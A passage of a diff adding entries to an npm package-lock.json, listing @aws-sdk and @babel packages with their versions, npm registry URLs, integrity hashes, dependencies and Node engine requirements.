"sha512-ri8YaQvXP6odteVTMfxPqFR26Q0h9ejtqhUDv47P34FaKXedEM4nC6ix6o+5FEYj6l8syGyktftZ5O70NoEhug==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@smithy/protocol-http": "^1.1.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/token-providers": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/token-providers/-/token-providers-3.363.0.tgz", + "integrity": "sha512-6+0aJ1zugNgsMmhTtW2LBWxOVSaXCUk2q3xyTchSXkNzallYaRiZMRkieW+pKNntnu0g5H1T0zyfCO0tbXwxEA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/client-sso-oidc": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/types": { + "version": "3.357.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/types/-/types-3.357.0.tgz", + "integrity": "sha512-/riCRaXg3p71BeWnShrai0y0QTdXcouPSM0Cn1olZbzTf7s71aLEewrc96qFrL70XhY4XvnxMpqQh+r43XIL3g==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/util-endpoints": { + "version": "3.357.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-endpoints/-/util-endpoints-3.357.0.tgz", + "integrity": "sha512-XHKyS5JClT9su9hDif715jpZiWHQF9gKZXER8tW0gOizU3R9cyWc9EsJ2BRhFNhi7nt/JF/CLUEc5qDx3ETbUw==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/util-locate-window": { + "version": "3.310.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-locate-window/-/util-locate-window-3.310.0.tgz", + "integrity": "sha512-qo2t/vBTnoXpjKxlsC2e1gBrRm80M3bId27r0BRB2VniSSe7bL1mmzM+/HFtujm0iAxtPM+aLEflLJlJeDPg0w==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/util-user-agent-browser": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-browser/-/util-user-agent-browser-3.363.0.tgz", + "integrity": "sha512-fk9ymBUIYbxiGm99Cn+kAAXmvMCWTf/cHAcB79oCXV4ELXdPa9lN5xQhZRFNxLUeXG4OAMEuCAUUuZEj8Fnc1Q==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/types": "^1.1.0", + "bowser": "^2.11.0", + "tslib": "^2.5.0" + } + }, + "node_modules/@aws-sdk/util-user-agent-node": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-node/-/util-user-agent-node-3.363.0.tgz", + "integrity": "sha512-Fli/dvgGA9hdnQUrYb1//wNSFlK2jAfdJcfNXA6SeBYzSeH5pVGYF4kXF0FCdnMA3Fef+Zn1zAP/hw9v8VJHWQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "aws-crt": ">=1.0.0" + }, + "peerDependenciesMeta": { + "aws-crt": { + "optional": true + } + } + }, + "node_modules/@aws-sdk/util-utf8-browser": { + "version": "3.259.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-utf8-browser/-/util-utf8-browser-3.259.0.tgz", + "integrity": 
"sha512-UvFa/vR+e19XookZF8RzFZBrw2EUkQWxiBW0yYQAhvk3C+QVGl0H3ouca8LDBlBfQKXwmW3huo/59H8rwb1wJw==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.3.1" + } + }, + "node_modules/@babel/cli": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/cli/-/cli-7.24.8.tgz", + "integrity": "sha512-isdp+G6DpRyKc+3Gqxy2rjzgF7Zj9K0mzLNnxz+E/fgeag8qT3vVulX4gY9dGO1q0y+0lUv6V3a+uhUzMzrwXg==", + "dev": true, + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.25", + "commander": "^6.2.0", + "convert-source-map": "^2.0.0", + "fs-readdir-recursive": "^1.1.0", + "glob": "^7.2.0", + "make-dir": "^2.1.0", + "slash": "^2.0.0" + }, + "bin": { + "babel": "bin/babel.js", + "babel-external-helpers": "bin/babel-external-helpers.js" + }, + "engines": { + "node": ">=6.9.0" + }, + "optionalDependencies": { + "@nicolo-ribaudo/chokidar-2": "2.1.8-no-fsevents.3", + "chokidar": "^3.4.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/cli/node_modules/commander": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-6.2.1.tgz", + "integrity": "sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/@babel/cli/node_modules/convert-source-map": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "dev": true + }, + "node_modules/@babel/code-frame": { + "version": "7.26.2", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", + "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-validator-identifier": "^7.25.9", + "js-tokens": "^4.0.0", + "picocolors": "^1.0.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/compat-data": { + "version": "7.26.8", + "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.8.tgz", + "integrity": "sha512-oH5UPLMWR3L2wEFLnFJ1TZXqHufiTKAiLfqw5zkhS4dKXLJ10yVztfil/twG8EDTA4F/tvVNw9nOl4ZMslB8rQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/core": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.9.tgz", + "integrity": "sha512-lWBYIrF7qK5+GjY5Uy+/hEgp8OJWOD/rpy74GplYRhEauvbHDeFB8t5hPOZxCZ0Oxf4Cc36tK51/l3ymJysrKw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@ampproject/remapping": "^2.2.0", + "@babel/code-frame": "^7.26.2", + "@babel/generator": "^7.26.9", + "@babel/helper-compilation-targets": "^7.26.5", + "@babel/helper-module-transforms": "^7.26.0", + "@babel/helpers": "^7.26.9", + "@babel/parser": "^7.26.9", + "@babel/template": "^7.26.9", + "@babel/traverse": "^7.26.9", + "@babel/types": "^7.26.9", + "convert-source-map": "^2.0.0", + "debug": "^4.1.0", + "gensync": "^1.0.0-beta.2", + "json5": "^2.2.3", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/babel" + } + }, + "node_modules/@babel/core/node_modules/convert-source-map": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", + "integrity": 
"sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "dev": true + }, + "node_modules/@babel/generator": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.9.tgz", + "integrity": "sha512-kEWdzjOAUMW4hAyrzJ0ZaTOu9OmpyDIQicIh0zg0EEcEkYXZb2TjtBhnHi2ViX7PKwZqF4xwqfAm299/QMP3lg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.26.9", + "@babel/types": "^7.26.9", + "@jridgewell/gen-mapping": "^0.3.5", + "@jridgewell/trace-mapping": "^0.3.25", + "jsesc": "^3.0.2" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-annotate-as-pure": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-annotate-as-pure/-/helper-annotate-as-pure-7.24.7.tgz", + "integrity": "sha512-BaDeOonYvhdKw+JoMVkAixAAJzG2jVPIwWoKBPdYuY9b452e2rPuI9QPYh3KpofZ3pW2akOmwZLOiOsHMiqRAg==", + "dev": true, + "dependencies": { + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-builder-binary-assignment-operator-visitor": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-builder-binary-assignment-operator-visitor/-/helper-builder-binary-assignment-operator-visitor-7.24.7.tgz", + "integrity": "sha512-xZeCVVdwb4MsDBkkyZ64tReWYrLRHlMN72vP7Bdm3OUOuyFZExhsHUUnuWnm2/XOlAJzR0LfPpB56WXZn0X/lA==", + "dev": true, + "dependencies": { + "@babel/traverse": "^7.24.7", + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-builder-react-jsx": { + "version": "7.22.10", + "resolved": "https://registry.npmjs.org/@babel/helper-builder-react-jsx/-/helper-builder-react-jsx-7.22.10.tgz", + "integrity": "sha512-cZr0nzCwrMp7Z8owt+YN8OncOqhG1eZLp/aRT5ftBnkLJTCB3Dnq/t52vSfWc6sGRWdDeawbksuh3pYQGCzVwA==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.22.5", + "@babel/types": "^7.22.10" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-compilation-targets": { + "version": "7.26.5", + "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.26.5.tgz", + "integrity": "sha512-IXuyn5EkouFJscIDuFF5EsiSolseme1s0CZB+QxVugqJLYmKdxI1VfIBOst0SUu4rnk2Z7kqTwmoO1lp3HIfnA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/compat-data": "^7.26.5", + "@babel/helper-validator-option": "^7.25.9", + "browserslist": "^4.24.0", + "lru-cache": "^5.1.1", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-create-class-features-plugin": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/helper-create-class-features-plugin/-/helper-create-class-features-plugin-7.25.0.tgz", + "integrity": "sha512-GYM6BxeQsETc9mnct+nIIpf63SAyzvyYN7UB/IlTyd+MBg06afFGp0mIeUqGyWgS2mxad6vqbMrHVlaL3m70sQ==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-member-expression-to-functions": "^7.24.8", + "@babel/helper-optimise-call-expression": "^7.24.7", + "@babel/helper-replace-supers": "^7.25.0", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7", + "@babel/traverse": "^7.25.0", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-create-regexp-features-plugin": { + "version": "7.25.2", + "resolved": 
"https://registry.npmjs.org/@babel/helper-create-regexp-features-plugin/-/helper-create-regexp-features-plugin-7.25.2.tgz", + "integrity": "sha512-+wqVGP+DFmqwFD3EH6TMTfUNeqDehV3E/dl+Sd54eaXqm17tEUNbEIn4sVivVowbvUpOtIGxdo3GoXyDH9N/9g==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "regexpu-core": "^5.3.1", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-define-polyfill-provider": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/@babel/helper-define-polyfill-provider/-/helper-define-polyfill-provider-0.6.2.tgz", + "integrity": "sha512-LV76g+C502biUK6AyZ3LK10vDpDyCzZnhZFXkH1L75zHPj68+qc8Zfpx2th+gzwA2MzyK+1g/3EPl62yFnVttQ==", + "dev": true, + "dependencies": { + "@babel/helper-compilation-targets": "^7.22.6", + "@babel/helper-plugin-utils": "^7.22.5", + "debug": "^4.1.1", + "lodash.debounce": "^4.0.8", + "resolve": "^1.14.2" + }, + "peerDependencies": { + "@babel/core": "^7.4.0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/@babel/helper-member-expression-to-functions": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.24.8.tgz", + "integrity": "sha512-LABppdt+Lp/RlBxqrh4qgf1oEH/WxdzQNDJIu5gC/W1GyvPVrOBiItmmM8wan2fm4oYqFuFfkXmlGpLQhPY8CA==", + "dev": true, + "dependencies": { + "@babel/traverse": "^7.24.8", + "@babel/types": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-module-imports": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", + "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/traverse": "^7.25.9", + "@babel/types": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-module-transforms": { + "version": "7.26.0", + "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", + "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-module-imports": "^7.25.9", + "@babel/helper-validator-identifier": "^7.25.9", + "@babel/traverse": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-optimise-call-expression": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.24.7.tgz", + "integrity": "sha512-jKiTsW2xmWwxT1ixIdfXUZp+P5yURx2suzLZr5Hi64rURpDYdMW0pv+Uf17EYk2Rd428Lx4tLsnjGJzYKDM/6A==", + "dev": true, + "dependencies": { + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-plugin-utils": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", + "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", + "dev": true, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-remap-async-to-generator": { + "version": "7.25.0", + "resolved": 
"https://registry.npmjs.org/@babel/helper-remap-async-to-generator/-/helper-remap-async-to-generator-7.25.0.tgz", + "integrity": "sha512-NhavI2eWEIz/H9dbrG0TuOicDhNexze43i5z7lEqwYm0WEZVTwnPpA0EafUTP7+6/W79HWIP2cTe3Z5NiSTVpw==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-wrap-function": "^7.25.0", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-replace-supers": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.25.0.tgz", + "integrity": "sha512-q688zIvQVYtZu+i2PsdIu/uWGRpfxzr5WESsfpShfZECkO+d2o+WROWezCi/Q6kJ0tfPa5+pUGUlfx2HhrA3Bg==", + "dev": true, + "dependencies": { + "@babel/helper-member-expression-to-functions": "^7.24.8", + "@babel/helper-optimise-call-expression": "^7.24.7", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-simple-access": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.24.7.tgz", + "integrity": "sha512-zBAIvbCMh5Ts+b86r/CjU+4XGYIs+R1j951gxI3KmmxBMhCg4oQMsv6ZXQ64XOm/cvzfU1FmoCyt6+owc5QMYg==", + "dev": true, + "dependencies": { + "@babel/traverse": "^7.24.7", + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-skip-transparent-expression-wrappers": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-skip-transparent-expression-wrappers/-/helper-skip-transparent-expression-wrappers-7.24.7.tgz", + "integrity": "sha512-IO+DLT3LQUElMbpzlatRASEyQtfhSE0+m465v++3jyyXeBTBUjtVZg28/gHeV5mrTJqvEKhKroBGAvhW+qPHiQ==", + "dev": true, + "dependencies": { + "@babel/traverse": "^7.24.7", + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-string-parser": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", + "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-validator-identifier": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", + "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-validator-option": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", + "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", + "dev": true, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-wrap-function": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/helper-wrap-function/-/helper-wrap-function-7.25.0.tgz", + "integrity": "sha512-s6Q1ebqutSiZnEjaofc/UKDyC4SbzV5n5SrA2Gq8UawLycr3i04f1dX4OzoQVnexm6aOCh37SQNYlJ/8Ku+PMQ==", + "dev": true, + "dependencies": { + "@babel/template": "^7.25.0", + "@babel/traverse": "^7.25.0", + "@babel/types": "^7.25.0" + }, + "engines": { + "node": 
">=6.9.0" + } + }, + "node_modules/@babel/helpers": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.9.tgz", + "integrity": "sha512-Mz/4+y8udxBKdmzt/UjPACs4G3j5SshJJEFFKxlCGPydG4JAHXxjWjAwjd09tf6oINvl1VfMJo+nB7H2YKQ0dA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/template": "^7.26.9", + "@babel/types": "^7.26.9" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/highlight": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.24.7.tgz", + "integrity": "sha512-EStJpq4OuY8xYfhGVXngigBJRWxftKX9ksiGDnmlY3o7B/V7KIAc9X4oiK87uPJSc/vs5L869bem5fhZa8caZw==", + "dev": true, + "dependencies": { + "@babel/helper-validator-identifier": "^7.24.7", + "chalk": "^2.4.2", + "js-tokens": "^4.0.0", + "picocolors": "^1.0.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/parser": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.9.tgz", + "integrity": "sha512-81NWa1njQblgZbQHxWHpxxCzNsa3ZwvFqpUg7P+NNUU6f3UU2jBEg4OlF/J6rl8+PQGh1q6/zWScd001YwcA5A==", + "license": "MIT", + "dependencies": { + "@babel/types": "^7.26.9" + }, + "bin": { + "parser": "bin/babel-parser.js" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@babel/plugin-bugfix-firefox-class-in-computed-class-key": { + "version": "7.25.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-firefox-class-in-computed-class-key/-/plugin-bugfix-firefox-class-in-computed-class-key-7.25.3.tgz", + "integrity": "sha512-wUrcsxZg6rqBXG05HG1FPYgsP6EvwF4WpBbxIpWIIYnH8wG0gzx3yZY3dtEHas4sTAOGkbTsc9EGPxwff8lRoA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/traverse": "^7.25.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-bugfix-safari-class-field-initializer-scope": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-safari-class-field-initializer-scope/-/plugin-bugfix-safari-class-field-initializer-scope-7.25.0.tgz", + "integrity": "sha512-Bm4bH2qsX880b/3ziJ8KD711LT7z4u8CFudmjqle65AZj/HNUFhEf90dqYv6O86buWvSBmeQDjv0Tn2aF/bIBA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression/-/plugin-bugfix-safari-id-destructuring-collision-in-function-expression-7.25.0.tgz", + "integrity": "sha512-lXwdNZtTmeVOOFtwM/WDe7yg1PL8sYhRk/XH0FzbR2HDQ0xC+EnQ/JHeoMYSavtU115tnUk0q9CDyq8si+LMAA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining/-/plugin-bugfix-v8-spread-parameters-in-optional-chaining-7.24.7.tgz", + "integrity": "sha512-+izXIbke1T33mY4MSNnrqhPXDz01WYhEf3yF5NbnUtkiNnm+XBZJl3kNfoK6NKmYlz/D07+l2GWVK/QfDkNCuQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": 
"^7.24.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7", + "@babel/plugin-transform-optional-chaining": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.13.0" + } + }, + "node_modules/@babel/plugin-bugfix-v8-static-class-fields-redefine-readonly": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-v8-static-class-fields-redefine-readonly/-/plugin-bugfix-v8-static-class-fields-redefine-readonly-7.25.0.tgz", + "integrity": "sha512-tggFrk1AIShG/RUQbEwt2Tr/E+ObkfwrPjR6BjbRvsx24+PSjK8zrq0GWPNCjo8qpRx4DuJzlcvWJqlm+0h3kw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-proposal-class-properties": { + "version": "7.18.6", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-class-properties/-/plugin-proposal-class-properties-7.18.6.tgz", + "integrity": "sha512-cumfXOF0+nzZrrN8Rf0t7M+tF6sZc7vhQwYQck9q1/5w2OExlD+b4v4RpMJFaV1Z7WcDRgO6FqvxqxGlwo+RHQ==", + "deprecated": "This proposal has been merged to the ECMAScript standard and thus this plugin is no longer maintained. Please use @babel/plugin-transform-class-properties instead.", + "dev": true, + "dependencies": { + "@babel/helper-create-class-features-plugin": "^7.18.6", + "@babel/helper-plugin-utils": "^7.18.6" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-proposal-object-rest-spread": { + "version": "7.20.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-object-rest-spread/-/plugin-proposal-object-rest-spread-7.20.7.tgz", + "integrity": "sha512-d2S98yCiLxDVmBmE8UjGcfPvNEUbA1U5q5WxaWFUGRzJSVAZqm5W6MbPct0jxnegUZ0niLeNX+IOzEs7wYg9Dg==", + "deprecated": "This proposal has been merged to the ECMAScript standard and thus this plugin is no longer maintained. 
Please use @babel/plugin-transform-object-rest-spread instead.", + "dev": true, + "dependencies": { + "@babel/compat-data": "^7.20.5", + "@babel/helper-compilation-targets": "^7.20.7", + "@babel/helper-plugin-utils": "^7.20.2", + "@babel/plugin-syntax-object-rest-spread": "^7.8.3", + "@babel/plugin-transform-parameters": "^7.20.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-proposal-private-property-in-object": { + "version": "7.21.0-placeholder-for-preset-env.2", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-private-property-in-object/-/plugin-proposal-private-property-in-object-7.21.0-placeholder-for-preset-env.2.tgz", + "integrity": "sha512-SOSkfJDddaM7mak6cPEpswyTRnuRltl429hMraQEglW+OkovnCzsiszTmsrlY//qLFjCpQDFRvjdm2wA5pPm9w==", + "dev": true, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-async-generators": { + "version": "7.8.4", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", + "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-class-properties": { + "version": "7.12.13", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", + "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.12.13" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-class-static-block": { + "version": "7.14.5", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", + "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-dynamic-import": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-dynamic-import/-/plugin-syntax-dynamic-import-7.8.3.tgz", + "integrity": "sha512-5gdGbFon+PszYzqs83S3E5mpi7/y/8M9eC90MRTZfduQOYW76ig6SOSPNe41IG5LoP3FGBn2N0RjVDSQiS94kQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-export-namespace-from": { + "version": "7.8.3", + "resolved": 